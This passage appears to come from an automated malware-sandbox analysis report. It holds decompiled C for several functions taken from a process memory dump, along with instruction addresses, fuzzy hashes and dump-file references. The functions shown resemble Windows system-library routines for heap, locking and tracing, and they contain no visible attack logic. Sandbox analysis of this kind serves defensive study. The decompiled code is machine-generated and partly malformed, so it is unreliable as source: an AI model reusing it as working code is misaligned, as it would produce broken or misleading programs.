							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E0463AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x46eb1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x46e84c0;
										if(_t69 >=  *0x46e84c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E046C9063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E045F922A(_t82);
							_t53 = E04617D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E046C8B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x46e86c0; // 0x9307b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x46e86b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x46e86bc;
										_t72 = 0x46e86b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E045F9240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x46e86c4;
									_t72 = 0x46e86c0;
									L18:
									E04629B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}

0x045f9100
0x045f9100
0x045f9100
0x045f9100
0x045f9102
0x045f9107
0x045f910c
0x045f9110
0x045f9115
0x045f9136
0x045f9143
0x046537e4
0x046537e4
0x045f9149
0x045f914e
0x045f914e
0x045f9117
0x045f911d
0x00000000
0x00000000
0x045f911f
0x045f9125
0x00000000
0x045f9151
0x045f9158
0x045f915d
0x045f9161
0x045f9168
0x04653715
0x00000000
0x045f916e
0x045f916e
0x045f9175
0x045f9177
0x045f917e
0x045f917f
0x045f9182
0x045f9182
0x045f9187
0x045f9187
0x045f918a
0x045f918d
0x045f918f
0x045f9192
0x045f9195
0x045f9198
0x045f9198
0x045f9198
0x045f919a
0x00000000
0x00000000
0x0465371f
0x04653721
0x04653727
0x0465372f
0x04653733
0x04653735
0x04653738
0x0465373b
0x0465373d
0x04653740
0x00000000
0x00000000
0x04653746
0x04653749
0x00000000
0x00000000
0x0465374f
0x04653751
0x00000000
0x00000000
0x04653757
0x04653759
0x0465375c
0x0465375c
0x0465375e
0x0465375e
0x04653761
0x04653764
0x00000000
0x00000000
0x04653766
0x04653768
0x046537a3
0x046537a3
0x046537a5
0x046537a7
0x046537ad
0x046537b0
0x046537b2
0x046537bc
0x046537c2
0x046537c2
0x046537b2
0x045f9187
0x045f9187
0x045f918a
0x045f918d
0x045f918f
0x045f9192
0x045f9195
0x00000000
0x045f9195
0x00000000
0x045f9187
0x0465376a
0x0465376a
0x0465376c
0x0465376c
0x0465376f
0x04653775
0x00000000
0x00000000
0x04653777
0x04653779
0x00000000
0x00000000
0x04653782
0x04653787
0x04653789
0x04653790
0x04653790
0x0465378b
0x0465378b
0x0465378b
0x04653792
0x04653795
0x04653795
0x04653798
0x04653798
0x0465379b
0x0465379b
0x045f91a3
0x045f91a9
0x045f91b0
0x045f91b4
0x045f91b4
0x045f91bb
0x045f91c0
0x045f91c5
0x045f91c7
0x046537da
0x045f91cd
0x045f91cd
0x045f91cd
0x045f91d2
0x045f91d5
0x045f9239
0x045f9239
0x045f91d7
0x045f91db
0x045f91e1
0x045f91e7
0x045f91fd
0x045f9203
0x045f921e
0x045f9223
0x00000000
0x045f9223
0x045f9205
0x045f9208
0x045f920c
0x045f9214
0x045f9214
0x045f91e9
0x045f91e9
0x045f91ee
0x045f91f3
0x045f91f3
0x045f91f3
0x045f91e7
0x00000000
0x045f91db
0x045f9187
0x045f9168

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50983277717c9879127dbc4feb23d014c0bef54d77db8b65a1c36f43889ef1e3
Instruction ID: b0954944751b738cb08853e19d2e2f6adb8961cb48bdacf2c431444faa4f1be2
Opcode Fuzzy Hash: 50983277717c9879127dbc4feb23d014c0bef54d77db8b65a1c36f43889ef1e3
Instruction Fuzzy Hash: D831F4B1E01A45DFEB25DF68D888FACB7F1BB88354F188569C90467350E334B980EB56

Uniqueness

Uniqueness Score: -1.00%

Function 04621DB5, Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E04621DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E0461F460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L04614620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E0461F460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}

0x04621dc2
0x04621dc5
0x04621dc7
0x04621dcc
0x04621dce
0x04621dd6
0x04621ddf
0x04621de0
0x04621de1
0x04621de5
0x04621de8
0x04621def
0x04621df0
0x04621df6
0x04621df7
0x04621dfe
0x04621e1a
0x00000000
0x00000000
0x04621e0b
0x04621e12
0x04621e12
0x04621e00
0x04621e00
0x04621e05
0x04621e1e
0x04621e23
0x0466570f
0x04665713
0x00000000
0x00000000
0x04665719
0x04665719
0x04621e2c
0x04621e2d
0x04621e2e
0x04621e2f
0x04621e31
0x04621e32
0x04621e35
0x04621e3d
0x04665723
0x0466573d
0x0466573d
0x00000000
0x04665723
0x04621e49
0x04621e4e
0x04621e4e
0x04621e09
0x00000000

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction ID: 12b0f86db681501b59395ab2432a1fb98e7a8c1de326c2903ba678c7519d2b38
Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction Fuzzy Hash: 8E21A172604629FFD721CF59CD80EABBBBDEF86754F154055E945A7220EA30BE01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04610050, Relevance: .1, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E04610050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x46ed360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E04629ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E0463B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E046C8A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E04629702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x46eb1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}

0x04610055
0x0461005d
0x04610062
0x0461006c
0x0461006f
0x04610074
0x0461007a
0x0461007a
0x04610080
0x04610080
0x04610087
0x0461008d
0x0461008f
0x04610093
0x04610095
0x0461009b
0x046100f8
0x046100fb
0x046100fc
0x046100ff
0x04610108
0x04610108
0x046100a2
0x046100a6
0x046100b3
0x046100bc
0x046100c5
0x046100ca
0x0465c01e
0x00000000
0x00000000
0x0465c02d
0x046100d5
0x046100d9
0x0465c03d
0x0465c046
0x0465c046
0x046100df
0x046100e2
0x046100ea
0x046100ef
0x046100f2
0x046100f6
0x04610111
0x04610117
0x04610117
0x00000000
0x046100f6
0x046100d0
0x046100d0
0x00000000

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfd8c9ac8b03be250faf16dc528c3de03e7fcfa39371c295b2fb67d788178bf4
Instruction ID: ffed877b90f1c01225b30c538a1d3fff8bba637dc9fd0c1bbf19b9c7851da1a4
Opcode Fuzzy Hash: dfd8c9ac8b03be250faf16dc528c3de03e7fcfa39371c295b2fb67d788178bf4
Instruction Fuzzy Hash: 63317C31601B049FDB21CF28C940B9AB3E5FF89719F18456DE49687B60EA76B841CB50

Uniqueness

Uniqueness Score: -1.00%

Function 04676C0A, Relevance: .1, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E04676C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E04617D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x46e7b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L04614620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E0463F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E04617D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E04639AE0();
						_t23 = L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}

0x04676c0a
0x04676c0f
0x04676c10
0x04676c13
0x04676c15
0x04676c19
0x04676c1c
0x04676c21
0x04676c28
0x04676c3a
0x04676c2a
0x04676c33
0x04676c33
0x04676c3f
0x04676c48
0x04676c4d
0x04676c60
0x04676c65
0x04676c69
0x04676c73
0x04676c79
0x04676c7f
0x04676c86
0x04676c90
0x04676c94
0x04676ca6
0x04676cb2
0x04676cbd
0x04676cbd
0x04676cc3
0x04676cc7
0x04676ccb
0x04676cd0
0x04676cd1
0x04676ce2
0x04676ce2
0x04676c69
0x04676ced

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d26eba88836f85ce4c429987afdc06104a9738d3a9176ebb544e28c6cf4af385
Instruction ID: ee06a8e0df5419d1e97fe17dc4b2de2a79113bd031a05ed88eb50fe1c2b49471
Opcode Fuzzy Hash: d26eba88836f85ce4c429987afdc06104a9738d3a9176ebb544e28c6cf4af385
Instruction Fuzzy Hash: 8221D1B1A00A44AFD715DF69D840F6AB7B8FF48714F04006AF804C77A0E634ED10CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 046390AF, Relevance: .1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E046390AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E0464D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E0462E5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L04614620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E0463F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E0462A2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}

0x046390af
0x046390b8
0x046390bb
0x046390bf
0x046390c2
0x046390c2
0x046390c8
0x046390cb
0x046390cd
0x046714d7
0x046714eb
0x046714eb
0x00000000
0x046714eb
0x046714db
0x046714e6
0x00000000
0x046714f2
0x046714e8
0x00000000
0x046714e8
0x046390d8
0x046390da
0x046390dd
0x046390e5
0x00000000
0x04639139
0x046390fa
0x046390fe
0x04639142
0x00000000
0x04639142
0x04639104
0x04639107
0x0463910b
0x04639110
0x04639118
0x04639147
0x04639148
0x0463914f
0x04639150
0x04639151
0x04639152
0x04639156
0x0463915d
0x04639160
0x04639168
0x0463916c
0x046391bc
0x046391be
0x00000000
0x046391be
0x0463916e
0x04639173
0x04639176
0x00000000
0x00000000
0x0463917c
0x04639180
0x046391b5
0x00000000
0x046391b5
0x04639182
0x04639185
0x04639189
0x00000000
0x00000000
0x0463918e
0x04639190
0x04639198
0x00000000
0x00000000
0x046391a0
0x00000000
0x046391ad
0x046391ad
0x046391b0
0x046391b1
0x00000000
0x04639185
0x0463911a
0x0463911c
0x0463911f
0x04639125
0x04639127
0x00000000

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction ID: 6f35a4d11a43b198770b247f14cd2222efa1de6e07fd10133e4d52f7ea6bc334
Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction Fuzzy Hash: 37217FB1A00344EFDB20DF69C884AAAB7F8EB54315F14886AE985A7310E770BD048F90

Uniqueness

Uniqueness Score: -1.00%

Function 04623B7A, Relevance: .1, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E04623B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x46e84c4; // 0x0
				_v12 = 1;
				_v8 =  *0x46e84c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L04614620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x46e84c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E0463AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E0463FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x46e84c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x46e84c4; // 0x0
					L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}

0x04623b89
0x04623b96
0x04623ba1
0x04623bab
0x04623bb5
0x04623bb9
0x04666298
0x04623bbf
0x04623bc2
0x04623bc3
0x04623bc9
0x04623bca
0x04623bcc
0x04623bcd
0x04623bd4
0x04623bd6
0x04623bdb
0x04623bea
0x04623bf7
0x04623bfb
0x04623bff
0x04623c09
0x04623c0a
0x04623c0b
0x04623c0f
0x04623c14
0x04623c18
0x04623c18
0x04623bfb
0x04623c1b
0x04623c30
0x04623c30
0x04623c3d

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb9a6294122cb5609724d535e02c95b1e747a441ef14454a00d51ae345148968
Instruction ID: 24d9188b52977b2c5d5548cb260bc0114db2a0b0b528427cf08445221dc83b0f
Opcode Fuzzy Hash: fb9a6294122cb5609724d535e02c95b1e747a441ef14454a00d51ae345148968
Instruction Fuzzy Hash: F321BEB2A00618EFD701DFA8CE81B5AB7BDFB40308F150068E908AB252E775BD559B94

Uniqueness

Uniqueness Score: -1.00%

Function 04676CF0, Relevance: .1, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E04676CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E04617D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E04617D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x45d5c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E0462F6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E0462F6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E04677016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L04612400( &_v52);
								}
								_t21 = L04612400( &_v28);
							}
						}
					}
				}
				return _t21;
			}

0x04676cfb
0x04676d00
0x04676d02
0x04676d06
0x04676d0a
0x04676d0e
0x04676d19
0x04676d2b
0x04676d1b
0x04676d24
0x04676d24
0x04676d33
0x04676d39
0x04676d46
0x04676d4f
0x04676d61
0x04676d51
0x04676d5a
0x04676d5a
0x04676d69
0x04676d6b
0x04676d6d
0x04676d6f
0x04676d6f
0x04676d74
0x04676d79
0x04676d7a
0x04676d7f
0x04676d82
0x04676d88
0x04676d89
0x04676d90
0x04676d94
0x04676da7
0x04676db1
0x04676db1
0x04676dbb
0x04676dbb
0x04676d90
0x04676d69
0x04676d46
0x04676dc6

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc0473984753e232209c91be68880caa03f6f7df3f88b6fac388886f76358da4
Instruction ID: 08ed0b2d77a0ae342a517fc7a7c91a63c03b0547d453cd1324d4110737b047c9
Opcode Fuzzy Hash: cc0473984753e232209c91be68880caa03f6f7df3f88b6fac388886f76358da4
Instruction Fuzzy Hash: 0121D072500B449FD311DF69C944BABB7ECEF91764F08455BB940C7260F734EA09C6A6

Uniqueness

Uniqueness Score: -1.00%

Function 046C070D, Relevance: .1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E046C070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E046C07DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E046BAFDE( &_v8,  &_v12);
					E046C1293(_t38, _v28, _t60);
					if(E04617D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E046B14FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}

0x046c071b
0x046c0724
0x046c0734
0x046c0738
0x046c074b
0x046c074b
0x046c0753
0x046c0753
0x046c0759
0x046c075d
0x046c0774
0x046c0779
0x046c077d
0x046c0789
0x046c0795
0x046c07a7
0x046c0797
0x046c07a0
0x046c07a0
0x046c07af
0x046c07c4
0x046c07cd
0x046c07cd
0x046c07af
0x046c07dc

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction ID: 422b4b415a98699b068b23726d7067f573f170458c7bd0e5aca3894e0ad5ef9e
Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
